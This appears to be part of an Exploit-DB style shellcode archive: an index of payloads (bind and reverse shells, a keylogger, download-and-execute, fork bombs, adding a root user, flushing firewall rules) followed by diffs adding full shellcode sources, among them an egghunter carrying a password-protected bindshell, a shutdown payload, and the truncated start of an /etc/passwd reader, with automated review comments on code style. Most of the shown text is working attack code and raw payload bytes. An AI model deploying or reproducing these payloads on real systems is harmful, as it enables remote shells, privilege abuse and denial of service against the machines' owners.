605 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
606 43602 shellcodes/linux_x86-64/43602.asm Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
607 43603 shellcodes/linux_x86-64/43603.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
608 43604 shellcodes/linux_x86-64/43604.c Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
609 43605 shellcodes/linux_x86-64/43605.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
610 43606 shellcodes/linux_x86-64/43606.c Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
611 43607 shellcodes/linux_x86-64/43607.c Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) 2009-01-01 zbt shellcode linux_x86-64
612 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
613 40549 shellcodes/windows_x86-64/40549.c Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
614 40560 shellcodes/windows_x86/40560.asm Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
615 40781 shellcodes/windows_x86-64/40781.c Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes) Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
616 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
617 40821 shellcodes/windows_x86-64/40821.c Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
618 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
619 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
620 40981 shellcodes/windows_x86-64/40981.c Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
621 41072 shellcodes/windows_x86-64/41072.c Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
622 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
623 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
624 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
625 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
626 41220 shellcodes/generator/41220.c Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator) Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
627 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes) Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
628 41375 shellcodes/linux/41375.c Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes) Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
629 41381 shellcodes/windows_x86/41381.c Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
630 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
631 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
632 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
633 41467 shellcodes/windows_x86/41467.c Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
634 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
635 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes) Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
636 41481 shellcodes/windows_x86/41481.asm Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
637 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
638 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
639 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
640 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
641 41581 shellcodes/windows_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
642 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
643 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve /bin/dash Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
644 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
645 43481 shellcodes/alpha/43481.c Alpha - execve() Shellcode (112 bytes) 2009-01-01 anonymous shellcode alpha
646 43482 shellcodes/alpha/43482.c Alpha - setuid() Shellcode (156 bytes) 2009-01-01 anonymous shellcode alpha
647 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
648 43489 shellcodes/linux_x86/43489.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode linux_x86
649 43497 shellcodes/arm/43497.asm Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes) 2018-01-11 Azeria shellcode arm
650 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
651 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
652 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
653 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
654 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
655 43507 shellcodes/freebsd_x86/43507.c FreeBSD - reboot() Shellcode (15 Bytes) 2009-01-01 zillion shellcode freebsd_x86
656 43508 shellcodes/irix/43508.c IRIX - execve(/bin/sh -c) Shellcode (72 bytes) 2009-01-01 anonymous shellcode irix
657 43509 shellcodes/irix/43509.c IRIX - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 anonymous shellcode irix
658 43510 shellcodes/irix/43510.c IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes) 2009-01-01 scut/teso shellcode irix
659 43511 shellcodes/irix/43511.c IRIX - execve(/bin/sh) Shellcode (68 bytes) 2009-01-01 scut/teso shellcode irix
660 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso shellcode irix
661 43520 shellcodes/arm/43520.c Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) 2017-03-31 dummys shellcode arm
664 43532 shellcodes/arm/43532.c Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
665 43533 shellcodes/arm/43533.c Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes) 2013-09-04 gunslinger_ shellcode arm
666 43534 shellcodes/arm/43534.c Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes) 2010-08-31 Jonathan Salwan shellcode arm
667 43536 shellcodes/arm/43536.c Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes) Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes) 2009-01-01 Neil Klopfenstein shellcode arm
668 43537 shellcodes/arm/43537.c Linux/StrongARM - setuid() Shellcode (20 bytes) 2009-01-01 funkysh shellcode arm
669 43538 shellcodes/arm/43538.c Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes) 2009-01-01 funkysh shellcode arm
670 43539 shellcodes/arm/43539.c Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes) Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes) 2009-01-01 funkysh shellcode arm
671 43545 shellcodes/linux_sparc/43545.c Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes) 2009-01-01 anathema shellcode linux_sparc
672 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
673 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes) Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
674 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
675 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
676 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
677 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
678 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
679 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
680 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
681 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
682 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
683 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
684 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
685 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
686 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
687 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
688 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
689 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
690 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
691 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes) Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
692 41750 shellcodes/linux_x86-64/41750.txt Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
693 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve /bin/sh Shellcode (21 bytes) 2017-03-29 WangYihang shellcode linux_x86
694 41827 shellcodes/windows_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
695 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
696 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
697 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
698 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes) Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
699 42016 shellcodes/windows/42016.asm Windows x86/x64 - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
700 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
701 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
702 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
703 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
704 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
705 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes) Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
706 42428 shellcodes/linux_x86/42428.c Linux x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
707 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
708 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
709 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
710 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
711 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes) Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
712 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
713 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
714 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
715 42992 shellcodes/windows_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64


@ -0,0 +1,98 @@
; Author Doreth.Z10
;
; Linux x86_64 Egghunter using sys_access()
; Shellcode size 49 bytes
;
global _start
section .text
_start:
xor rsi, rsi ; Some prep junk.
push rsi
pop rdx
push 8
pop rbx
go_end_of_page:
or dx, 0xfff ; We align with a page size of 0x1000
next_byte:
inc rdx ; next byte offset
push 21
pop rax ; We load access() in RAX
push rdx
pop rdi
add rdi, rbx ; We need to be sure our 8 byte egg check does not span across 2 pages
syscall ; syscall to access()
cmp al, 0xf2 ; Checks for EFAULT. EFAULT indicates bad page access.
jz go_end_of_page ; if EFAULT, try next page
; --
; Put your won egg here !
mov eax, 0xBEBDBEBD ; Egg contruction so we dont catch ourself !
not eax ; Important, EGG must contain NOP like instruction bytecode.
; --
mov rdi, rdx
scasd
jnz next_byte ; if egg does not match, try next byte
cmp eax, [rdi]
jnz next_byte ; if egg does not match, try next byte
jmp rdi ; Good, found egg. Jump !
; Important, EGG must contain NOP like instruction bytecode.
;
; Egghunter demonstration
;
; bindshell is pushed in the heap using a malloc() call and pre-pended with the egg. Then egghunter is fired.
;
; Depending on size of the malloc() call, binshell can be anywhere in the address space.
; For a big malloc() size like 1 000 000 bytes, it will be placed far in the address space.
; A malloc(1000000) was tested on a Unbuntu system with Inter Core i7 and it took over 9 hrs for the egghunter
; to find the egg.
;
; Enjoy.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char egg[] =
"YOUR EGG HERE 4 bytes";
// In this example we use a password protected binshell on port 1337: pAzzW0rd
unsigned char bindshell[] =
"\xeb\x09\x48\x31\xff\x48\xf7\xe7\x57\x5e\xc3\x55\x48\x89\xe5\xe8\xee\xff\xff\xff\x04\x29\x40\x80\xc7\x02\xff\xc6\x0f\x05\x50\xe8\xde\xff\xff\xff\x04\x31\x48\x8b\x3c\x24\x56\x81\xc6\x03\x01\x05\x39\x66\x81\xee\x01\x01\x56\x48\x89\xe6\x80\xc2\x10\x0f\x05\xe8\xbe\xff\xff\xff\x04\x32\x48\x8b\x7d\xf8\x0f\x05\xe8\xb1\xff\xff\xff\x04\x2b\x48\x8b\x7d\xf8\x48\x89\xe6\x80\xc2\x18\x52\x48\x89\xe2\x0f\x05\x49\x89\xc0\xe8\x97\xff\xff\xff\x4c\x89\xc7\x40\x80\xec\x18\x48\x89\xe6\x80\xc2\x18\x0f\x05\x48\xb8\x70\x41\x7a\x7a\x57\x30\x72\x64\x48\x89\xe7\x48\xaf\x75\x42\x48\x31\xc0\x4c\x89\xc7\x48\x31\xf6\x40\x80\xc6\x02\x04\x21\x0f\x05\x48\x31\xc0\x04\x21\x48\xff\xce\x75\xf4\x0f\x05\xe8\x55\xff\xff\xff\x50\x04\x3b\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x50\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x48\x89\xec\x5d\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05";
unsigned char egghunter[] =
"\x48\x31\xf6\x56\x5a\x6a\x08\x5b\x66\x81\xca\xff\x0f\x48\xff\xc2\x6a\x15\x58\x52\x5f\x48\x01\xdf\x0f\x05\x3c\xf2\x74\xea\xb8\xbd\xbe\xbd\xbe\xf7\xd0\x48\x89\xd7\xaf\x75\xe2\x3b\x07\x75\xde\xff\xe7";
main()
{
char *heap = (char*)malloc(1000000);
memset(heap, '\0', 512);
strncpy(heap, egg, 4);
strncpy(heap+4, egg, 4);
strncpy(heap+8, bindshell, 212);
printf("Egghunter Length: %d\n", strlen(egghunter));
printf("Shellcode Length: %d\n", strlen(bindshell));
int (*ret)() = (int(*)())egghunter;
ret();
return 0;
}
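Review bot: Both `printf` calls in `main` pass the `size_t` result of `strlen` to a `%d` conversion, which is undefined behaviour on a 64-bit target; the other harnesses on this page cast to `int` first. I would print the array size instead, `printf("Egghunter Length: %zu\n", sizeof egghunter - 1);` and likewise for `bindshell`, which also avoids handing an `unsigned char *` to `strlen` and does not stop counting at an embedded zero byte. `main()` is declared without a return type, and the `malloc` result is passed to `memset` unchecked. The later harnesses that call `strlen(code)` and `strlen(stager)` share the `unsigned char[]` mismatch.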


@ -0,0 +1,64 @@
/*
; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
xor rax, rax
xor rdx, rdx
push rax
push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp
push rax
push word 0x682d ;-h
mov rcx, rsp
push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp
push rdx
push rbx
push rcx
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a"
"\x77\x66\x68\x6e\x6f\x48\x89\xe3"
"\x50\x66\x68\x2d\x68\x48\x89\xe1"
"\x50\x49\xb8\x2f\x73\x62\x69\x6e"
"\x2f\x2f\x2f\x49\xba\x73\x68\x75"
"\x74\x64\x6f\x77\x6e\x41\x52\x41"
"\x50\x48\x89\xe7\x52\x53\x51\x57"
"\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
"\x05";
int
main() {
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}


@ -0,0 +1,72 @@
; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================
section .text
global _start
_start:
xor rax, rax ; clear rax and rdx
cdq
; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------
push rax
push word 0x682d ;-h
push rsp
pop rcx
; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------
push rax
push byte 0x77
push word 0x6f6e ; now
push rsp
pop rbx
push rax
push rbx
push rcx
; -------------------------------------------------------------------
; 3. store '/sbin/shutdown' on stack
; -------------------------------------------------------------------
push rsp
pop rsi
push rax
jmp shutdown
cont:
pop rdi
push 15
pop rcx
do_add:
add byte [rdi+rcx], 0x01
loop do_add
push 59
pop rax
syscall
shutdown:
call cont
c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d
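Review bot: The step label `3. store '/sbin/shutdown' on stack` does not match the instructions under it. `push rsp` / `pop rsi` only takes the address of the pointer array built in steps 1 and 2, and the path is never pushed: it is reached through `jmp shutdown` / `call cont` / `pop rdi` and rewritten in place by `do_add`. I would retitle the step `; 3. rsi = pointer array from steps 1-2; rdi = path decoded in place from c_1` and put `; c_1 is "///sbin/shutdown" with bytes 1..15 each reduced by 1` above the data line, so a reader does not have to decode it by hand. The encoded tables `s_1` and `sc` in the listings that follow have no plain-text description of their decoded contents either.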


@ -0,0 +1,89 @@
; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-867.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 105 bytes (got shorter by 13 bytes)
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; file names. Each byte (except the first one) was xor'ed with the
; value 0x32. The decoder part xor's each byte (except the first)
; with this very same value.
;
; ===================================================================
section .text
global _start
_start:
xor rsi, rsi
jmp string_1
cont_1:
pop rdi
; decode
push 24
pop rcx
decode:
xor byte [rdi+rcx], 0x32
loop decode
